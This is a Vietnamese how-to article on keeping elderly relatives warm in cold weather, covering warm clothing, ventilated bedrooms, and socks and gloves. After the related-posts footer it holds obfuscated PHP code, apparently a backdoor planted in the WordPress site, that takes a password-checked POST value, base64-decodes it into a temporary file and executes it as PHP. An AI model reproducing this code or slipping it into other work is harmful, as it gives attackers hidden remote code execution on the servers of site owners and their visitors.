Cách giữ ấm cho người già

Mỗi khi thời tiết trở lạnh, ngoài việc giữ ấm cho bản thân thì cũng nên chú ý cách giữ ấm cho cha mẹ già, hoặc trong gia đình có người cao tuổi. Người già cơ thể không được khỏe mạnh như người trẻ nên cần biết cách chăm sóc giữ ấm cho họ.

1. Giữ nhiệt độ cơ thể để không bị lạnh

Thời tiết thay đổi thì cơ xương người già cũng trở nên đau nhức vì tuổi tác, nhất là đối với phụ nữ lớn tuổi. Việc quan trọng là chúng ta cần giúp họ giữ ấm cơ thể để sức khỏe được ổn định. Vì người cao tuổi chịu lạnh kém do sức khỏe đã yếu đi, dẫn đến nhiều bệnh nguy hiểm cho sức khỏe khi thời tiết thay đổi. Nhiều người mắc bệnh huyết áp, nhồi máu cơ tim, đau xương khớp, khó thở, các bệnh về hô hấp ngày càng nghiêm trọng. Đó là những tác hại do để cơ thể trở lạnh, do đó cần cho người già mặc quần áo ấm và khăn len, mũ len để họ cảm giác được thoải mái và dễ chịu hơn trong thời tiết lạnh giá.

Cách giữ ấm cho người già-1

2.  Mặc ấm nhưng thoáng

Vì người cao tuổi sức khỏe yếu nên sẽ khó hoạt động nhiều được nên hãy chú ý nhiều đến quần áo cho người lớn tuổi. Hãy để họ mặc quần áo ấm sạch sẽ và giặt giũ thường xuyên, những đồ giữ ấm tốt nhất là những quần áo dài nhưng dày vừa phải để khi thời tiết ấm dần thì họ cũng có thể thoải mái hơn mà không bị nóng nực.

Xem Thêm  Cach chữa hăm tã ở trẻ sơ sinh

3. Phòng ngủ cần thoáng mát

Phòng ngủ người già cũng cần chú ý giữ cho thoáng đãng. Đa số phòng ngủ cần có không khí thoải mái để khi nằm ngủ chúng ta có thể ngủ ngon giấc hơn. Sức khỏe người trẻ thì có thể nằm máy điều hòa lâu được, nhưng đối với người già thì không nên để họ nằm điều hòa quá lâu vì cơ thể họ rất yếu. Hơi thở cũng yếu hơn người trẻ, làn da cũng khô ráp hơn, vì trời lạnh mà bật điều hòa sưởi quá nhiều sẽ không tốt đến hệ hô hấp và da của người già. Hãy để căn phòng được thoáng khí bằng những ô cửa sổ và mặc áo ấm cho người già, như vậy sức khỏe sẽ cải thiện hơn.

4. Đảm bảo đủ ấm cho chân, tay

Trời trở lạnh thì đôi chân đôi tay lúc nào cũng trở nên ê buốt và khó chịu nhất. Nhất là người già thì sức khỏe yếu nên cần trang bị cho họ những đôi vớ và bao tay để khi cần có thể giữ ấm cơ thể. Chân tay được giữ ấm sẽ giúp cơ thể ngủ ngon hơn.

Như vậy, việc giữ ấm cho cơ thể người già là vô cùng quan trọng. Bởi lẽ, ở tuổi cao, sức đề kháng không còn được như ban đầu nên những việc nhỏ như không giữ ấm cho các bộ phận trong cơ thể cũng sẽ tiềm ẩn nguy cơ đột ngụy, nhồi máu cơ tim bất kỳ khi nào.

Xem Thêm  Những điều lưu ý khi trẻ mọc răng

Wiki Cách Làm

Bài Liên Quan:

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}